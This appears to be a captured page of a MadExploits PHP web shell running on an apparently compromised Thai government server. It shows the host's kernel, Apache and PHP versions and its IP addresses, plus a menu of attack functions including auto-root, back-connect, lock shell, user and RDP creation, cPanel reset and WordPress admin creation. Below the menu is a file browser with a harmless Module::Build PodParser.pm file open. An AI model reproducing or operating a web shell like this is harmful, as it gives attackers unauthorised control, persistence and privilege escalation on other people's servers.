Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
Module /
Build /
[ HOME SHELL ]
Name
Size
Permission
Action
Platform
[ DIR ]
drwxr-xr-x
API.pod
61.6
KB
-rw-r--r--
Authoring.pod
10.73
KB
-rw-r--r--
Base.pm
131.11
KB
-rw-r--r--
Compat.pm
16.23
KB
-rw-r--r--
Config.pm
1.08
KB
-rw-r--r--
ConfigData.pm
6.12
KB
-rw-r--r--
Cookbook.pm
16.93
KB
-rw-r--r--
Dumper.pm
444
B
-rw-r--r--
ModuleInfo.pm
11.58
KB
-rw-r--r--
Notes.pm
7.5
KB
-rw-r--r--
PPMMaker.pm
4.9
KB
-rw-r--r--
PodParser.pm
2.15
KB
-rw-r--r--
Version.pm
14.4
KB
-rw-r--r--
YAML.pm
4.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PodParser.pm
package Module::Build::PodParser; use strict; use vars qw($VERSION); $VERSION = '0.35'; $VERSION = eval $VERSION; use vars qw(@ISA); sub new { # Perl is so fun. my $package = shift; my $self; # Try using Pod::Parser first if (eval{ require Pod::Parser; 1; }) { @ISA = qw(Pod::Parser); $self = $package->SUPER::new(@_); $self->{have_pod_parser} = 1; } else { @ISA = (); *parse_from_filehandle = \&_myparse_from_filehandle; $self = bless {have_pod_parser => 0, @_}, $package; } unless ($self->{fh}) { die "No 'file' or 'fh' parameter given" unless $self->{file}; $self->{fh} = IO::File->new($self->{file}) or die "Couldn't open $self->{file}: $!"; } return $self; } sub _myparse_from_filehandle { my ($self, $fh) = @_; local $_; while (<$fh>) { next unless /^=(?!cut)/ .. /^=cut/; # in POD last if ($self->{abstract}) = /^ (?: [a-z:]+ \s+ - \s+ ) (.*\S) /ix; } my @author; while (<$fh>) { next unless /^=head1\s+AUTHORS?/ ... /^=/; next if /^=/; push @author, $_ if /\@/; } return unless @author; s/^\s+|\s+$//g foreach @author; $self->{author} = \@author; return; } sub get_abstract { my $self = shift; return $self->{abstract} if defined $self->{abstract}; $self->parse_from_filehandle($self->{fh}); return $self->{abstract}; } sub get_author { my $self = shift; return $self->{author} if defined $self->{author}; $self->parse_from_filehandle($self->{fh}); return $self->{author} || []; } ################## Pod::Parser overrides ########### sub initialize { my $self = shift; $self->{_head} = ''; $self->SUPER::initialize(); } sub command { my ($self, $cmd, $text) = @_; if ( $cmd eq 'head1' ) { $text =~ s/^\s+//; $text =~ s/\s+$//; $self->{_head} = $text; } } sub textblock { my ($self, $text) = @_; $text =~ s/^\s+//; $text =~ s/\s+$//; if ($self->{_head} eq 'NAME') { my ($name, $abstract) = split( /\s+-\s+/, $text, 2 ); $self->{abstract} = $abstract; } elsif ($self->{_head} =~ /^AUTHORS?$/) { push @{$self->{author}}, $text if $text =~ /\@/; } } sub verbatim {} sub interior_sequence {} 1;
Close